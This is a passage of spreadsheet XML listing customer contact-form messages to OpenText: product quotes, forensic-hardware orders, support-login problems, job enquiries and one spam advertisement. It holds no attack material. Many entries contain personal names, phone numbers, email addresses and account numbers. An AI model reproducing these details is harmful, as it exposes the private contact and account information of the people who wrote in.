    <t>Hi! I'm working on an opportunity with my colleagues in US for a customer who's seeking assistance to modernise their legacy platform which is written in Gupta SQL. I am interested to learn about options how we could work with Opentext to team up with your experts to look at GuptaSql code and determine best approach to re-write in different language which is easily maintained and supported._x000D_
_x000D_
I can be best reached on 416 571 0959._x000D_
cheers! Murali Nair</t>
  </si>
  <si>
    <t>Request for quotation for 50 employees.</t>
  </si>
  <si>
    <t>I would like to check who is receiving this inquiry - if a human is reading this please contact me. Thanks, Peter.</t>
  </si>
  <si>
    <t xml:space="preserve">I contact with your company distributor in middle east, looking for price offer for tableau Items,_x000D_
but I have no replay _x000D_
the tender well over at 25-10, so please help me pricing these item </t>
  </si>
  <si>
    <t>Accessing the portal for the first time and I am not allowed to change my password.  The process fails.  Screens says I am constructing a strong password.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wenn ich an der Nutzung von opentext workflow interessiert wäre, welche SAP Lizenz würde ich benötigen?_x000D_
_x000D_
VG_x000D_
Kai Krebs</t>
  </si>
  <si>
    <t>This is a test . please ignore it</t>
  </si>
  <si>
    <t>Dear Sirs,_x000D_
We - Quang Khanh Co., Ltd. (TTK – New Technology, Technique &amp; Key-man) is professional System Integrator. Our clients is Industrial Plants (TPP &amp; HPP Plants; Chemical Factories;  Refinery Plants, Oil &amp; Gas Corporation); Science&amp;Technology Institute of Ministry of Science &amp; Technology (MoST), Ministry of Training &amp; Education (MoTE) and Ministry of Defence (MoD)._x000D_
At present time, some our clients (institute of MoD &amp; MoST) need the some systems to encase extraction data from hard drive of computer. Which is specification as followings example:_x000D_
1.1. Fast backup devices for GSI Tableau TD3 hard drives (or TD2);_x000D_
1.2. Equipment TDPX5: anti-write data to hard drive, support protocols: (SATA/IDE/SAS/USB/FireWire)_x000D_
1.3. Equipment TDPX6: Anti-write in to memory card of Cellphone, Photo-camera KTS; Video Camera KTS;_x000D_
1.4. Equipment TDPX8: replace the "hot" SATA hard drive_x000D_
1.5. USB external hard drive SEAGATETM backup plus desk external, HDD 2TB 3.5" USB 3.0.  _x000D_
1.6.Encase Portable Data Collection data and Analysis Data;_x000D_
1.7. PC forensic ( such as: Intel Core i7, 3.4 GHz; DDRam 3, 12 GB, HDD 2TB 3.5" SATA, SSD 128GB, DVD-RW, LED 19");_x000D_
1.8. Software recovery Data, electronic evidence Encase._x000D_
1.9. Software recovery Data and electronic evidence FTK_x000D_
1.10. Software Virtual Forensic Computing (VFC)._x000D_
  Kindly please send to us Quotation of your products with competitive price according to mentions requirements.  _x000D_
 Beside it, also confirm the cost of The Training Program and transfering technology by Expert of Original Producer._x000D_
2/Please issue LoA and send a draft of contract as well._x000D_
We are looking for long-term co-opearation!_x000D_
 Faithfully &amp; Sincerely,_x000D_
Technical Director of TTK_x000D_
Ngo Quang Dzung_x000D_
Cell-phone.: +84.916168899_x000D_
=============================_x000D_
Our address:_x000D_
Quang Khanh Co., Ltd. (TTK – New Technology, Technique &amp; Key-man)_x000D_
No.: 23 /gate 603 LacLongQuan, Tay Ho distr., Hanoi, Vietnam_x000D_
Tel./Fax.: (+84) 24.35373548; 35374156; 37370890;_x000D_
E-Mail.: TTKgroup</t>
  </si>
  <si>
    <t>ist die enterprise scan software mit Window 10 kompatible? ich benötige dringend Feedback. Danke VG BD</t>
  </si>
  <si>
    <t xml:space="preserve">Melissa Shawn Hamby Johnson </t>
  </si>
  <si>
    <t xml:space="preserve">This would be the second time I will have submitted this form to get a sales agent to contact me re documentum.  </t>
  </si>
  <si>
    <t>I need this deposit asap to make two bill payments because my husband was out of work 3 weeks_x000D_
 I didn't know if tjere wasnt something  else I could do to speed up the process?!</t>
  </si>
  <si>
    <t>My login to the support portal does not link me to the resources like licensing. My login doesn't seem to be associated with a support contract.</t>
  </si>
  <si>
    <t>Hi,_x000D_
Tried to use my company email address yesterday with this question but I think any answer may got stuck in our mailing/epost filters. Trying with my personal email instead._x000D_
_x000D_
I've been using Open Source BIRT designer and Runtime viewer for a couple of years with_x000D_
good experience. Now I'm looking for more extentions (type filtering and interactivity) and_x000D_
have been testing your Analytics Designer and iHub in my laptop._x000D_
_x000D_
Is iHub available on other platforms?_x000D_
_x000D_
I've been running the OS BIRT Runtime Viewer on both zLinux (s390)/Tomcat and on_x000D_
z/OS (Mainframe)/Websphere with good luck._x000D_
_x000D_
Best regards,_x000D_
Örjan Lindholm, orjan@lindholms.org</t>
  </si>
  <si>
    <t xml:space="preserve">I need to download RightFax 16EP4 Media for an upgrade that ProcessFlows are carrying out for us, my  RightFax SUID is: 06717-12270. </t>
  </si>
  <si>
    <t>Bonjour, Nous sommes à la recherche d'un outil pour remplacer MaQuali de ICMS qui n'est pas compatible avec notre niveau de sécurité informatique et qui ne répond pas aux exigences des BPF._x000D_
Cordialement. Sylvie Rouillé</t>
  </si>
  <si>
    <t>Streamserve opentxt , we need to get the trial version and setup guide to begin with the Stream Serve Functionality</t>
  </si>
  <si>
    <t>Document Template Management</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to register for Dec 10, 2018 5-0161 OpenText Consultant Certification Bootcamp English Virtual Classroom - South Africa, please assist. Cannot proceed to step 2 of the registration process. </t>
  </si>
  <si>
    <t>We're using a very old version of Teleform (v9.1) on a stand-alone workstation. We now want to upgrade Teleform on 1 or 2 Windows 10 workstations and use our Ricoh Multifunctionals to scan the forms. Is this possible and what are the costs for education?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are an image processing service bureau based in Vilnius, Lithuania._x000D_
Our main services are any kind of retouch, background extraction, color correction etc._x000D_
_x000D_
The majority of our clients are based in USA, where ordering via paper forms is still the dominant method between end user/buyer and photographer company._x000D_
Up until 6-8 years ago we had a Kofax solution for this process, but due to focusing on main business we stopped offering this service._x000D_
Now we are being asked more and more often to bring this service back, and for that purpose we have started researching the market._x000D_
_x000D_
Order forms is a mix of OCR, ICR, OMR and barcodes. Some forms run in very short numbers, thus the solution must be very easy and fast when setting up a new form._x000D_
For now we have no influence on design of forms or scanning quality. Due to this not being a main focus, our expectation regarding number of forms to validate/extract is as follows:_x000D_
_x000D_
Year 1 - 50.000 to 300.000_x000D_
Year 2 - 300.000 to 700.000_x000D_
Year 3 - 700.000 to 1.200.000_x000D_
_x000D_
Expected launch date is around mid February_x000D_
_x000D_
We have our own IT / server facilities onsite, but can be open to a cloud solution._x000D_
_x000D_
For further info please contact:_x000D_
_x000D_
Johnny Christensen_x000D_
CEO_x000D_
_x000D_
+45 40 37 50 96_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello, I am a university student in Korea._x000D_
I have an Encase Forensics software usb, and I don't know where to get Encase Forensics download site..._x000D_
Could you  give me the latest version of Encase Forensics?_x000D_
Please answer me.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
My name's Michal Osiecki and I'm deputy sales manager at TTS Company from Poland._x000D_
I would like to know how can I order 2 licenses of Open Text Exceed for my customer? _x000D_
And what will be price for the resale ?? </t>
  </si>
  <si>
    <t>need trial version of opentext streamserve and documentation of setup and configuration for learning purpose</t>
  </si>
  <si>
    <t>Hej,_x000D_
_x000D_
Vi har inbetalninganr från er som vi inte kan placera. Vänligen återkoppla till oss på paymentfactoring@ikano.se_x000D_
Mvh Nilclas Eriksson</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Madame/ Sir, _x000D_
_x000D_
Greetings from UNODC. We would like to request quotation for 5 units for Tableau Forensic Write Blocker with below specs._x000D_
_x000D_
Specifications:_x000D_
• Connectors: Device, Write-Blocked _x000D_
• PCIe: One PCIe custom data + power connector adapters_x000D_
• SATA/SAS: One SAS/SATA data connector (SAS Gen 1, SATA Gen 2)_x000D_
• SATA: One SATA Gen 3 data connector_x000D_
• FireWire: One FireWire 800 9pin connector_x000D_
• USB 3.0: One USB 3.0 Type A 9pin connector_x000D_
• IDE: One IDE 40” data connector, DC Out:  One DC Out 3M 4pin drive power connector (for IDE, SAS, SATA &amp; PCIe) _x000D_
• USB3 Host Cable, Nylon Kit Bag_x000D_
• Power Supply and Quick Start Guide_x000D_
• User Configurable: Read-Only or Read-Write._x000D_
_x000D_
We look forward to hearing from you. _x000D_
_x000D_
Thank you and best regards/ Ajarie_x000D_
_x000D_
***************  _x000D_
Ajarie Salilasiri_x000D_
Programme &amp; Administrative Associate_x000D_
UNODC Regional Office for Southeast Asia and the Pacific_x000D_
3rd Fl., B Block, UN Building_x000D_
Raj Damnern Nok Ave., Bangkok 10200 Thailand_x000D_
Tel: (+66-2)288-2083, Fax: (+66-2) 281-2129_x000D_
E-mail: &lt;ajarie.salilasiri@un.org&gt;_x000D_
</t>
  </si>
  <si>
    <t>I Would like to discontinue my service.  My account # is:  779694 and current invoice # is:  1810779694.   I have previously tried to cancel my service but to no avail.   I do not want to pay this current charge since I had cancelled two months ago.  Please advise</t>
  </si>
  <si>
    <t xml:space="preserve">Hi my name is Jorge I speak good English and Spanish native, </t>
  </si>
  <si>
    <t>Estamos interesados en evaluar Documentum como alternativa de ECM para el instituto.</t>
  </si>
  <si>
    <t>I still can't access the My Support page to download the newest version of EnCase.  I've tried the confirmation email several times and I keep getting the error message saying I haven't confirmed the email.</t>
  </si>
  <si>
    <t xml:space="preserve">I want to discuss go-to market strategy for Healthcare providers. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I want to get in touch with a salesrep to undestand the features of Hightail product and how we can leverage it._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Raj</t>
  </si>
  <si>
    <t>I need to convert extreme mainframe code to the distributed version of the software and need to understand the process</t>
  </si>
  <si>
    <t xml:space="preserve">Приветствую Вас, меня зовут Александр, и я частный интернет-маркетолог и директолог. _x000D_
С 2015 года занимаюсь привлечением трафика путём настройки и ведения контекстной рекламы в Яндекс.Директ и Google.Реклама. _x000D_
 _x000D_
Напишите на почту или позвоните, _x000D_
Почта: alex2015.marketolog@gmail.com _x000D_
Телефон: 8(977)463-11-76 _x000D_
 _x000D_
За это время я приобрел большой опыт в создании рекламных компаний, которые показывают реальный результат : увеличивают количество поступающих обращений за счет привлечения новой аудитории. _x000D_
 _x000D_
 _x000D_
Путем глубокого анализа рекламных компаний, снижаю расходы на рекламу и в разы увеличиваю ее эффективность: _x000D_
- настраиваю рекламу так, чтобы она показывалась только вашей целевой аудитории _x000D_
- устраняю нецелевой трафик, который съедает ваш бюджет _x000D_
 _x000D_
Все знают, что реклама – двигатель торговли. Этот канал дает клиентов в максимально быстрые сроки. Моя задача — сделать для Вас рекламу прозрачной и финансово выгодной. _x000D_
При работе максимально погружаюсь в вашу тематику, веду _x000D_
плотное взаимодействие с заказчиком и провожу сравнительный анализ конкурентов. _x000D_
Даю советы по улучшению показателей конверсии сайта. _x000D_
 _x000D_
Я работаю с разными клиентами, включая крупных заказчиков с рекламным бюджетом до 400 000 руб. в месяц. _x000D_
 _x000D_
Сильные стороны, которые выделяют во мне заказчики: _x000D_
1. Высокая эффективность и отличный результат _x000D_
2. Всегда на связи _x000D_
3. Оперативное выполнение задач _x000D_
 _x000D_
--- КОМУ я буду полезен: _x000D_
- интернет-магазинам _x000D_
- сайтам с услугами _x000D_
Для увеличения количества заявок _x000D_
 _x000D_
--- ЧЕМ я буду Вам полезен: _x000D_
Качественно настрою эффективную контекстную рекламу Яндекс.Директ, РСЯ или Гугл.Реклама, КМС _x000D_
Срок разработки рекламных компаний от 3 до 9 дней; _x000D_
Стоимость 1 рекламной системы 9 900 руб. для тематики услуг и 15 900 руб. для интернет-магазинов. _x000D_
 _x000D_
--- ДОПОЛНИТЕЛЬНО занимаюсь: _x000D_
Комплексной поддержкой вашего бизнеса по онлайн маркетингу - это не только реклама, но доработки по сайтам, телефонии, акциям и скидкам _x000D_
 _x000D_
У вас наверняка есть и будут </t>
  </si>
  <si>
    <t>Support site access, missing user ID._x000D_
Previous IT company has left, we need to transfer a license, and update contact information. I have a ticket in with the OpenText Host Explorer team for install, but they can't proceed. I have the License and Invoice PDF's available to work from for verification, however the prior IT staff account that was registered is not available. Maintenance is active on the account.</t>
  </si>
  <si>
    <t>Account reset needed</t>
  </si>
  <si>
    <t>We are looking for _x000D_
_x000D_
TC5-8-R2 - Tableau SATA to 3M Drive Power Cable - 8"     5 QTY_x000D_
TC3-8 - Tableau SATA Signal Cable - 8"                               2 QTY_x000D_
TDA3-1 - Tableau Micro-SATA SSD Drive Adapter               5 QTY_x000D_
C4-8-R2 - Tableau Unified SATA/SAS Signal and Power Cable (3M-style) - 8"    5 QTY</t>
  </si>
  <si>
    <t xml:space="preserve">TO:  HUMAN RESOURCES _x000D_
FROM: Employment Screening Resources_x000D_
RE: Employment Verification (2897211)._x000D_
_x000D_
Hello,_x000D_
My name is Taryn Frampton with Employment Screening Resources and I’m attempting to obtain usable contact information for the correct department (Human Resources, Payroll or Personnel) in order to conduct an Employment Verification._x000D_
_x000D_
The information we will be requesting is the start date, end date and position title._x000D_
_x000D_
Please contact ESR at your earliest convenience and provide a usable phone number, e-mail or fax number.  Your prompt attention to this matter will be greatly appreciated._x000D_
_x000D_
Thank you,_x000D_
Taryn Frampton - Verification Specialist_x000D_
Employment Screening Resources (ESR)_x000D_
_x000D_
SEND RESPONSE TO ESR: _x000D_
_x000D_
VIA Fax to: 415-466-8032  Attn: Taryn Frampton_x000D_
_x000D_
Via email to:  tframpton@esrcheck.com _x000D_
Phone: 415-761-9088_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm trying to obtain the installation file for Vista Plus Output Manager (VPOM). Could you please provide me with the VPOM installation file._x000D_
_x000D_
Thanks,_x000D_
Robbie Deutsch</t>
  </si>
  <si>
    <t>Hi, Just wondering if there's a problem with the display of deductions today. I currently have 3 listed when I open the deductions screen under the last 7 days. When I filter it to 'none' &amp; apply, 2 of the deductions disappear and only 1 remains. I'm expecting to see a display of all deductions issued to PVH. Please investigate &amp; advise. Thanks!</t>
  </si>
  <si>
    <t>TrustedLink is required for Speede. School Transcripts exchange</t>
  </si>
  <si>
    <t>I cannot get access despite changing the password. Please advise what to do?</t>
  </si>
  <si>
    <t>Interested in CMS pricing and product demo.</t>
  </si>
  <si>
    <t>Awful web site support for EnCase users! Since opentext has taken over, EnCase seems to be an afterthought. Does the company just not care? Navigation is a pain in the...!</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to reset my password on the OpenText Connect URL. I keep on getting the error Password Failed to Update. </t>
  </si>
  <si>
    <t>I am looking for a .dwg viewer to be installed on our terminal servers. What version of your software can just view the file and what is the price?_x000D_
Thanks,_x000D_
Greg</t>
  </si>
  <si>
    <t>Looking for guidance with the MS Azure OpenText deployment, starting from no knowledge</t>
  </si>
  <si>
    <t>Internship regrading Engineering Intern</t>
  </si>
  <si>
    <t>We just upgraded from Rightfax version 9.4 to 16.2 and was asked what the limit of characters was for the FaxUtil emailing portion. I know in 9.4 we had to limit the field to 31 characters but was told that the new version it was increased but I wanted to check to make sure the exact size so we dont run into any issues._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">new customer service contact set up required as I will no longer be handling . New contact Tricia.freni@analog.com  781-461-3373  </t>
  </si>
  <si>
    <t xml:space="preserve">Need training details on Introduction course of Exstream </t>
  </si>
  <si>
    <t>Professional Service</t>
  </si>
  <si>
    <t>I need to know if the OpenText Brava Desktop, Image Only product (49$ version), makes measurements in pdf. Thanks.</t>
  </si>
  <si>
    <t>AAAA內容aaaa</t>
  </si>
  <si>
    <t>Dear Sirs and Madames,_x000D_
_x000D_
I write my master's thesis in computer science, at the FernUniversität in Hagen (Germany),_x000D_
in cooperation with the police NRW._x000D_
_x000D_
The topic is:_x000D_
"Analysis of data reduction possibilities for linux file systems"._x000D_
_x000D_
I have heard of your great software and I would like to look more_x000D_
closely at the features and benefits._x000D_
_x000D_
Would it be possible to get a trial version of EnCase Forensic for the_x000D_
time of my master's thesis?_x000D_
_x000D_
Best regards_x000D_
Jens Hartschen</t>
  </si>
  <si>
    <t xml:space="preserve">My name is Grzegorz Pałczyński. I represent a computer company PRIMAR - IT  which operates in the area of IT sector on Polish market since 1994. We offer a wide range of IT products and solutions for business companies as well as public domain institutions. We implement the latest technologies and standards to meet our customer's IT needs perfectly.. _x000D_
Our client in Poland  is interested to purchase in the way of public tender your products : _x000D_
_x000D_
Open Text Exceed  - 2 licenses _x000D_
_x000D_
We are interested to offer above software and would like to ask you if we can get good reseller price from you for that deal._x000D_
I will be very grateful if we can start our cooperation. _x000D_
I hope in the future we can still make some business by another occasion._x000D_
I look forward to the answer. _x000D_
Yours faithfully _x000D_
Grzegorz Pałczyński – sales manger_x000D_
</t>
  </si>
  <si>
    <t>Hi, We used to talk with Sérgio Ovalle about application maintenance situations. Now that he is no longer in the company we can talk to who?_x000D_
_x000D_
Please provid us one email and phone number here in Portugal._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>I have used Eclipse BIRT (Designer and runtime Viewer) for a couple of years and_x000D_
now lack of some functions I see that you have developed in your Analytics and iHub._x000D_
_x000D_
I've downloaded and installed a trial version of your product for running on Windows_x000D_
but I wonder what other environments the iHub is available on._x000D_
_x000D_
BIRT Runtime Viewer i have sucessfully installed in zLinux(S390 linux)/Tomcat and_x000D_
on z/OS/WebSphere and I wonder if iHub is supported on these environments as well?_x000D_
_x000D_
Regards,_x000D_
/Örjan Lindholm, HCL Technologies</t>
  </si>
  <si>
    <t>We are exploring possibilities of incorporating a document management system into our offices and are keen to know the terms and conditions of obtaining open text DM at least for our legal team.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I just have a few questions_x000D_
1. If I have a parent website and a few child websites, is it possible for me to make changes to the parent website and it will automatically apply throughout all the child websites? _x000D_
2. If there are any bugs midway through the process, is there any technical support provided? If yes, what kind of support? _x000D_
3. Could you send me the prices and bundles? _x000D_
Thank you </t>
  </si>
  <si>
    <t>We are looking for Content Server and Extended ECM cloud server for internal training in IBM. Could you please share details. Please feel free to call.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
I would like to inform you that we are looking for the solution for Data retrieving from PC, Mobile Phone (Android and iOS), USB Storage for Data Analysis and  Forensic purpose. _x000D_
_x000D_
Please let us know  if your solution can meet our requirement._x000D_
_x000D_
Looking forward to hear from you._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Important my package for me </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I am contactin your fron NOC in Doha, Qatar. We have your email contact asamater@opentext.xom. We are updating our supplier database, can you please give me a correct contact with full name? Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">helpdesk directly. </t>
  </si>
  <si>
    <t>Looking for abroad</t>
  </si>
  <si>
    <t>please cancel account</t>
  </si>
  <si>
    <t>To ask for any posts open in 'Operations' in your organization</t>
  </si>
  <si>
    <t xml:space="preserve">dear Sales team _x000D_
could you please send  us your best price offer for _x000D_
_x000D_
1- Tableau T35u Kit _x000D_
2-Tableau T6u Kit _x000D_
3-Tableau T8u Kit _x000D_
4- Tableau T9 kit _x000D_
5- Tableau T7u Kit with PCIe Bridge_x000D_
6-UltraBlock USB 3.0 Forensic Card reader_x000D_
7- Tableau Drive Adapter kit _x000D_
_x000D_
B.R_x000D_
Munther  </t>
  </si>
  <si>
    <t>Work at opentext, willing to move to Australia Sydney. Wife work in Sydney from her organisation. I have work visa.</t>
  </si>
  <si>
    <t>Hello_x000D_
Excumse I try to Register to the portal and Get access of My support_x000D_
But every Time I Can't_x000D_
What should I Do?_x000D_
I have an Encase Forensic_x000D_
Thanks</t>
  </si>
  <si>
    <t>Can I have the details for online training in sap vim along with workflows ? And please do let me know how much it cost.</t>
  </si>
  <si>
    <t>방금가입을 했는 데 웹서버오류라고 가입이 안됀다고 뜹니다</t>
  </si>
  <si>
    <t>I'm looking for the forklift operator position</t>
  </si>
  <si>
    <t>Job Application</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm looking for an internship to write my Masterthesis._x000D_
How to apply?_x000D_
_x000D_
Kind regards_x000D_
Sebastian Duad</t>
  </si>
  <si>
    <t xml:space="preserve">for the post of account executive </t>
  </si>
  <si>
    <t>IR</t>
  </si>
  <si>
    <t xml:space="preserve">To whom may it concern:_x000D_
I'm writing to inform you that we checked your website thoroughly and found about your company.we are a software technology company and interested in your company ._x000D_
we would like to negotiate and purchase your products.Please give us more information about your detail.would it be possible to send us your updated catalogs and price list?_x000D_
thank you in advance,_x000D_
looking forward to your answer._x000D_
i really appreciate your consideration._x000D_
 Best  regards_x000D_
_x000D_
 A.Aghaie Abianeh_x000D_
Foreign Affairs Manager_x000D_
</t>
  </si>
  <si>
    <t>Samshar Shaka 9833084883</t>
  </si>
  <si>
    <t>Can I request for Mac</t>
  </si>
  <si>
    <t>Dear Sir / Madam,_x000D_
_x000D_
I have recently come across your HANA Consultant job posting on the job portal. I would be interested in applying for this position.  _x000D_
_x000D_
Please find enclosed my resume. My resume provides up-to-date information on my background and qualifications._x000D_
_x000D_
 _x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
 _x000D_
_x000D_
 Thanks and Kind Regards,_x000D_
_x000D_
Rizvi</t>
  </si>
  <si>
    <t xml:space="preserve">Hshssg veevee  e rr r r  rr </t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
_x000D_
I’m reaching out today in hopes to connect with the manager for OpenText's Brentwood office. Adventure Science Center is Middle Tennessee’s premier cultural institution for STEM learning. We support local teachers, students, and families in their pursuit of science and technology education and engagement. Each year, we reach over 350,000 individuals, 45% of which are from Tennessee._x000D_
_x000D_
After reading about OpenText's giving priorities, I believe we would be a great match for partnership. I’d love to set up an exploratory call or meeting to learn more about OpenText and discuss opportunities to support STEM education in our community._x000D_
_x000D_
All the best,_x000D_
Karissa Kessen</t>
  </si>
  <si>
    <t>From time to time I have a hard time getting an icon from Rightfax onto Lanier and Ricoh printers (or restoring if deleted).   I'm looking for support documents to recreate the icon on the printer display.   I've attempted a reinstall recently, and that didnt' recreate the icon.  Thank you, Rich Valenta Forefront Dermatology (purchasing through Badger Office, Manitowoc, WI).   920-663-9025</t>
  </si>
  <si>
    <t>I need access to the Jakks Pacific account - the past user has left the company</t>
  </si>
  <si>
    <t>Requesting a CSR for all fax lines associated with the account 862424.  LOA is in my possession if needed.</t>
  </si>
  <si>
    <t>Pricing for OpenText Fax2Mail solution.  Two fax numbers, about 200 faxes sent and received per month</t>
  </si>
  <si>
    <t>We accidentally sent multiple invoices for the same PO, but only need 1 to be processed.  How do we go about making sure that is resolved? Thank you.</t>
  </si>
  <si>
    <t>Hello, I have a very techinical question, does EnCase or any of your products handle the recovery of deleted files from SSD drives? I know there is a process going on preventing recovering deleted files (SHIFT+DELETE) but I need to know if you have made any progress against this matter. Thanks!</t>
  </si>
  <si>
    <t>Is there a website or some other verification process that I can direct someone to if they need to verify my EnCE certification?</t>
  </si>
  <si>
    <t>I used Teleform for a large-scale healthcare system a number of years ago. I'm currently working up a proposal for an agency doing water quality testing. I'm wondering if you have any examples of forms collecting scientific or environmental data. I'm also looking for pricing information.</t>
  </si>
  <si>
    <t>County of San Diego has four licenses for Team Developer 5.1 and 5.2. There are problems  with both versions and I need the downloads. Unify, Centura, or Gupta websites no longer provide the downloads. Can you assist ?</t>
  </si>
  <si>
    <t>I'd like a demo of the product as we are about to enter an agreement with a large corporation that already uses it.</t>
  </si>
  <si>
    <t xml:space="preserve">looking for Demo of product, on accelerated pace </t>
  </si>
  <si>
    <t>We have a very old version of eDocs that will sunset soon. I would like to understand the current Open Text offerings and how we might benefit from those in Document Management and other Information Governance solutions.</t>
  </si>
  <si>
    <t>B2B managed services for EDI. I need a quote.</t>
  </si>
  <si>
    <t xml:space="preserve">I am with General Dynamics. We have you listed as a Supplier. I want to send the Cyber Security Compliance form for you to fill out and send back. Please provide me with an email address. This is our 4th ATTEMPT._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi OpenText Team...reached out a few days back...was hoping to connect with someone._x000D_
_x000D_
Thanks,_x000D_
Nate</t>
  </si>
  <si>
    <t>Upgrade Quote request from RightFax V10 to current with upgrade services if available.</t>
  </si>
  <si>
    <t>I'm trying to create a support account for our instance of VistaPlus for Information Systems at Colorado State University._x000D_
_x000D_
End User name:  EU0022977_x000D_
Product line with: 1000038162  _x000D_
_x000D_
I've attempted several times to create the account, and got the confirmation e-mails but still cannot login to the support site.   Please advise what I can do to get this access working._x000D_
_x000D_
--_x000D_
Ray Frush</t>
  </si>
  <si>
    <t>I had a customer call our office wanting to buy 75 licenses for the Documentum product.  She is out of Houston, TX.  Her email is ddeleon@exnaroffshore.com.  Please contact her.  I was not sure who to contact.</t>
  </si>
  <si>
    <t>all the confirmation including its images are gone from RightFax. And under Tools, Options, "Automated Deletion" is set to Never...my confirmations will be in there for a few days then its gone. Why is it deleting? And how can I make sure they never delete unless i manually delete them myself? Please advise as this is affecting my entire team and we need these Confirmations to fight any possible denials. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Request for Demo (Law Firm) - Document Management Software </t>
  </si>
  <si>
    <t>We are working to migrate/upgrade our current RightFax deployment to a new server using the latest version of RightFax. I have the steps to perform the process, but I need to download the media and obtain any new activation keys that may be needed. Can someone please assist?</t>
  </si>
  <si>
    <t>We need information about BLAZON. How much is this product? Do you have a evaluation (30-day) copy?_x000D_
Regards,_x000D_
Nelson</t>
  </si>
  <si>
    <t xml:space="preserve">I am not an IT person so I'm looking for assistance in understanding your products.  I work for a small department within the hospital which handles approximately 1,000-2,000 patient education documents (e.g. brochures, pamphlets, resources sheets).  Some of these documents are internally produced and some are ordered from external agencies. We're looking for a system that 1) acts as a catalogue and allows us to tag items with several search terms (e.g. chemotherapy, breast cancer, side-effects) 2) allows us to record were hard and soft copies are available (e.g. patient library, doctors office, website, patient web based application) 3) allows us to attached Word or PDF copies of the document for printing when hardcopies are out of stock 4) is user friendly so that our volunteers who tend to not be as comfortable with technology can search items.   I should add too that this is for a small department with very limited budget which will certainly limit what we can purchase. Thanks for you help.  </t>
  </si>
  <si>
    <t>we have installed the streamserver app versión 5.6.1._x000D_
We don´t know if we have maintenance of this app_x000D_
we want to know if we can pay an anual maintenance for this app_x000D_
could you send me your answer by email, please</t>
  </si>
  <si>
    <t>Our company (Cushman &amp; Wakefield fka DTZ) will be issuing an RFI to replace our current global contract management platform in the coming weeks.   If our company does not already have a sale rep assigned, could you please give me the contact info of a sales rep we can liaise with for this initative.    Thank you!</t>
  </si>
  <si>
    <t>I am trying to get an assigned sales representative from OpenText to schedule a demo. I already sent in a message on this form on October 15, 2018 and have not heard anything back.  Making me think that OpenText does not want any more business.</t>
  </si>
  <si>
    <t>training information</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in organising an online demonstration of File Intelligence and would like someone to contact me regarding the possibility. </t>
  </si>
  <si>
    <t>I'm not sure if I have asked this question before, but I work for Canon Solutions America on the helpdesk. We get some calls on Rightfax and was wondering if there was any DEMO or NFR licensing I could get for my lab? Please let me know._x000D_
_x000D_
Best Regards,_x000D_
Dennis</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je fais suite à notre conversation téléphonique de tout à l'heure pour savoir s'il est possible d'obtenir une licence de démonstration pour la solution Opentext Content Server 16 ou 10.5 ?_x000D_
_x000D_
J'ai travaillé sur CS 10.5 lorsque je travaillais avec l'entreprise CGI pour le client SNCF Réseau et maintenant que je suis dans l'entreprise Norsys, j'aimerais présenter à ma nouvelle entreprise cette solution Opentext CS._x000D_
_x000D_
Pour cela il faut que je puisse installer la solution sur un environnement de démonstration._x000D_
_x000D_
Dans l'attente de votre retour._x000D_
_x000D_
Jonathan RIO_x000D_
Concepteur/Développeur chez NORSYS_x000D_
Tel : 06 25 34 35 90</t>
  </si>
  <si>
    <t>I need the system requirements for DM eDocs v16. We are currently running DM v 5.7.1. and we are considering upgrading. We are trying to understand the scope of such an upgrade and what other upgrades need to be done in our infrastructure._x000D_
_x000D_
What I am looking for is req's for OS-version for application server and client/terminal server, MS Office version for Office Add-in compatibilty and such. Database requirements  also, please.  _x000D_
_x000D_
Thank you_x000D_
_x000D_
Oyvind Asebostol</t>
  </si>
  <si>
    <t>I received the letter to go over the code of conduct and complete the attestation, but the webpage is not very user friendly and I need assistance in getting this completed._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi support team, _x000D_
_x000D_
Could you please contact me at mrooij@opentext.com? _x000D_
_x000D_
_x000D_
Thanks! _x000D_
_x000D_
Michel van Rooij</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
I am from BuyIn, the Procurement Alliance between two telecommunications companies, Deutsche Telekom and Orange._x000D_
_x000D_
I am writing to you as I am launching a request for information with the aim to identify potential providers of technology and services in the area of customer satisfaction surveying and reporting._x000D_
_x000D_
Assuming your interest, could you please contact me in order that we can discuss in more detail?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
With best regards,_x000D_
Gergely Kalapos</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, wir arbeiten mit der Scansoftware enterprice scan und aktuell läuft die Software mit Windows XP. Wir möchten auf einen Windows 10 PC umstellen. Ist die Software mit windows 10 kompartibel? Danke, VG BD</t>
  </si>
  <si>
    <t xml:space="preserve">I can not login to my support. I had access, then there were some changes on your side. Now I can login, I get information that I need to confirm my email, I do that, and I get information that I need to confirm my email again. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,    _x000D_
_x000D_
My name is Georgiana Nechifor and I am contacting you on behalf of JCUSA, we are missing SEPTEMBER invoice for account #853777._x000D_
Please send the PDF copy for this invoice ASAP so we can make the payments.   _x000D_
_x000D_
Best regards,_x000D_
_x000D_
</t>
  </si>
  <si>
